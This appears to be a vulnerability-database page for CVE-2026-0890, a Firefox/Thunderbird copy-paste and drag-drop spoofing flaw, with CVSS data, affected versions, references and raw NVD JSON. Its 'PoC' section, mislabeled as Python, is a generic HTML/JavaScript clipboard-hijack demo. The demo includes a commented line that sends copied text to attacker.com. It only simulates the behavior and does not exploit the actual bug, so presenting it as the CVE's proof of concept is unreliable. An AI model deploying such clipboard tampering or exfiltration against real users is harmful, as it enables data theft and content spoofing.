CVE-2026-0890

Description

Spoofing issue in the DOM: Copy & Paste and Drag & Drop component. This vulnerability was fixed in Firefox 147, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE

Mozilla Firefox < 147

Firefox ESR < 140.7

Mozilla Thunderbird < 147

Thunderbird ESR < 140.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2026-0890 PoC: DOM Copy & Paste Spoofing -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-0890 PoC</title>
</head>
<body>
    <h1>Copy/Paste Spoofing Demo (CVE-2026-0890)</h1>
    <p>Select and copy the text below, then paste it in the textarea:</p>
    <div id="source">Safe Text to Copy</div>
    <br>
    <textarea id="target" placeholder="Paste here..."></textarea>
    <div id="log"></div>
    
    <script>
        // Simulate the vulnerability behavior
        document.addEventListener('copy', function(e) {
            // Intercept copy event - potential data exfiltration
            var selection = window.getSelection().toString();
            console.log('User copied: ' + selection);
            
            // In real attack, this could send data to attacker server
            // fetch('https://attacker.com/log?data=' + encodeURIComponent(selection));
            
            // Demonstrate spoofing: modify clipboard content
            e.preventDefault();
            var spoofedText = selection + ' [MODIFIED BY ATTACKER]';
            e.clipboardData.setData('text/plain', spoofedText);
            
            document.getElementById('log').innerHTML = 
                'Intercepted copy: ' + selection + '<br>' +
                'Spoofed to: ' + spoofedText;
        });

        // Drag and drop spoofing demonstration
        document.addEventListener('dragover', function(e) {
            e.preventDefault();
            console.log('Drag event intercepted');
        });

        document.addEventListener('drop', function(e) {
            e.preventDefault();
            var data = e.dataTransfer.getData('text/plain');
            console.log('Dropped data: ' + data);
            // In real attack, could steal dropped sensitive data
            document.getElementById('log').innerHTML += 
                '<br>Dropped data captured: ' + data;
        });
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0890
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0890
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0890/
[4] VulDB https://vuldb.com/cve/CVE-2026-0890
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=2005081
[6] https://www.mozilla.org/security/advisories/mfsa2026-01/
[7] https://www.mozilla.org/security/advisories/mfsa2026-03/
[8] https://www.mozilla.org/security/advisories/mfsa2026-04/
[9] https://www.mozilla.org/security/advisories/mfsa2026-05/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0890", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:39.523", "lastModified": "2026-04-13T15:17:18.443", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spoofing issue in the DOM: Copy & Paste and Drag & Drop component. This vulnerability was fixed in Firefox 147, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Problema de suplantación en el DOM: componente de Copiar y Pegar y Arrastrar y Soltar. Esta vulnerabilidad afecta a Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147 y Thunderbird < 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "A2FC50B3-5A36-4702-8CF6-CC732E3B148B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2005081", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}